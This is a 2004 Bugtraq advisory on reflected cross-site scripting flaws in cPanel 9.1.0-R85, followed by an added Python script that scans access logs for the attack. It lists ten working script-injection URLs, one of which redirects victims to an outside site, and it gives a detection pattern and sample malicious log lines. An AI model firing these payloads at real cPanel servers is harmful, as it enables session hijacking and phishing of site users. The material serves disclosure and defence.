cPanel Multiple Module Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 10002 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 30 2004 12:00AM |
| Updated: | Mar 30 2004 12:00AM |
| Credit: | Discovery is credited to sullo <[email protected]>. |
| Vulnerable: | cPanel cPanel 9.1.0-R85 |
| Not Vulnerable: | |
Discussion
Multiple cross-site scripting vulnerabilities have been identified in cPanel that may allow an attacker to execute arbitrary HTML or script code in a user's browser. These issues exist due to a failure of the application to properly validate user-supplied URI input.
The issues are reported to affect the 'account', 'db', 'login', 'email', 'dir', 'dns' and 'ip' parameters of 'ignorelist.html', 'showlog.html', 'repairdb.html', 'doaddftp.html', 'editmsg.html', 'testfile.html', 'erredit.html', 'dnslook.html', 'del.html' and 'index.html' scripts.
The issues have been reported to affect version 9.1.0-R85 of the software; however, it is quite likely that these issues affect previous versions of the software as well.
Exploit / POC
No exploit is required.
The following proof of concept examples have been provided:
http://www.example.com/frontend/x/cpanelpro/ignorelist.html?account="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/cpanelpro/showlog.html?account=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/sql/repairdb.html?db=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/ftp/doaddftp.html?login="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/cpanelpro/editmsg.html?account="><script>alert('Vulnerable')</script>
http://www.example.com/frontend/x/testfile.html?email=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/err/erredit.html?dir=public_html/&file=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='http://www.cirt.net/'</script>
http://www.example.com/frontend/x2/denyip/del.html?ip=<script>alert('Vulnerable')</script>
http://www.example.com/frontend/x2/htaccess/index.html?dir=<script>alert('Vulnerable')</script>
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
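With no vendor patch listed, reviewing web access logs for requests against the affected scripts is a practical check. The following is an added example, not part of the original advisory: it flags requests to the listed scripts whose affected parameters decode to HTML metacharacters. The combined log format, the `/frontend/` path filter (taken from the proof-of-concept URLs), the choice of flagged characters and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> parameters, taken from the advisory text and its proof-of-concept URLs
# ('file' for erredit.html appears only in the proof of concept).
AFFECTED = {
    "ignorelist.html": {"account"}, "showlog.html": {"account"},
    "editmsg.html": {"account"}, "repairdb.html": {"db"},
    "doaddftp.html": {"login"}, "testfile.html": {"email"},
    "erredit.html": {"dir", "file"}, "dnslook.html": {"dns"},
    "del.html": {"ip"}, "index.html": {"dir"},
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: account, database, login, e-mail, path, DNS and IP values never need these.
MARKUP = re.compile(r'[<>"]')

def suspicious_params(log_line):
    """Return (script, parameter, decoded value) for affected parameters carrying markup."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]
    if "/frontend/" not in url.path or script not in AFFECTED:
        return []
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded input
        if name in AFFECTED[script] and MARKUP.search(value):
            hits.append((script, name, value))
    return hits

def scan(lines):
    """Collect hits across an iterable of access-log lines."""
    return [hit for line in lines for hit in suspicious_params(line)]

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Mar/2004:10:00:00 +0000] "GET /frontend/x/sql/repairdb.html?db=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [30/Mar/2004:10:00:05 +0000] "GET /frontend/x/sql/repairdb.html?db=shop_orders HTTP/1.1" 200 498',
    '203.0.113.9 - - [30/Mar/2004:10:01:00 +0000] "GET /frontend/x2/denyip/del.html?ip=%253Cb%253E HTTP/1.1" 200 301',
    '203.0.113.9 - - [30/Mar/2004:10:02:00 +0000] "GET /frontend/x2/net/dnslook.html?dns=example.org HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"{script}: {param}={value!r}")
```

A hit shows that markup was submitted to an affected parameter, not that it was rendered in a browser; the response body or a patched build decides that.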